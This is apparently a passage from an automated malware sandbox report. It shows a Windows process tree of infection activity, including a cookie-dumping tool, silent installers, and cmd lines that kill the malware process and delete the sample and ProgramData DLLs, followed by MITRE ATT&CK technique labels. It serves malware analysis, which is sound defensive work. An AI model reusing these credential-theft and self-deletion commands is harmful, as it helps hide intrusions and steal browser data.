        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5700
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1072

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5296

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5160

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5456

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\cec62a46b60344888b0c59b9c57e6aae /t 6024 /p 5160
1⤵
PID:4604

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:5476

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6176
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{082ae590-fa25-6641-ae63-2835dac6fe6c}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:6644
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:6916

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:6996

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:6988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6652

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5416

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:812
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6D737AB80C97D8FC03CF88551F3C86A7 C
  2⤵
  PID:3340
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FE7871367FFC499217844C4BF11F7140
  2⤵
  PID:6708
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:6148
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
    3⤵
    PID:5036

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\6d23831763ca40e682d8052a7d5bf290 /t 4700 /p 6652
1⤵
PID:3416

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:3396
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:4284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6944

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6296

C:\Users\Admin\AppData\Roaming\bfdagdd
C:\Users\Admin\AppData\Roaming\bfdagdd
1⤵
PID:6908
- C:\Users\Admin\AppData\Roaming\bfdagdd
  C:\Users\Admin\AppData\Roaming\bfdagdd
  2⤵
  PID:8472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\656.exe
C:\Users\Admin\AppData\Local\Temp\656.exe
1⤵
PID:7380

C:\Users\Admin\AppData\Local\Temp\DCA.exe
C:\Users\Admin\AppData\Local\Temp\DCA.exe
1⤵
PID:7520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7360

C:\Users\Admin\AppData\Local\Temp\3855.exe
C:\Users\Admin\AppData\Local\Temp\3855.exe
1⤵
PID:6840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3855.exe"
  2⤵
  - Blocklisted process makes network request
  PID:4068
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:1564

C:\Users\Admin\AppData\Local\Temp\49CB.exe
C:\Users\Admin\AppData\Local\Temp\49CB.exe
1⤵
PID:5532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im 49CB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\49CB.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 49CB.exe /f
    3⤵
    - Kills process with taskkill
    PID:6588
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:6324

C:\Users\Admin\AppData\Local\Temp\5248.exe
C:\Users\Admin\AppData\Local\Temp\5248.exe
1⤵
PID:6960

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7784

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\577eebe8090a4292afe56e8e2e2122c5 /t 6000 /p 7360
1⤵
PID:3276

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:520

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7852

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2528

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6868

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2220

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7320

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7864

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5512

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0c6a7a0831e74e5abe526fddecb6bdc1 /t 6832 /p 6944
1⤵
PID:7456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7220

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\e9d9a2539c7649cab28d34d5f3a04c20 /t 0 /p 7220
1⤵
PID:7988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4480

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:60

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6920

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery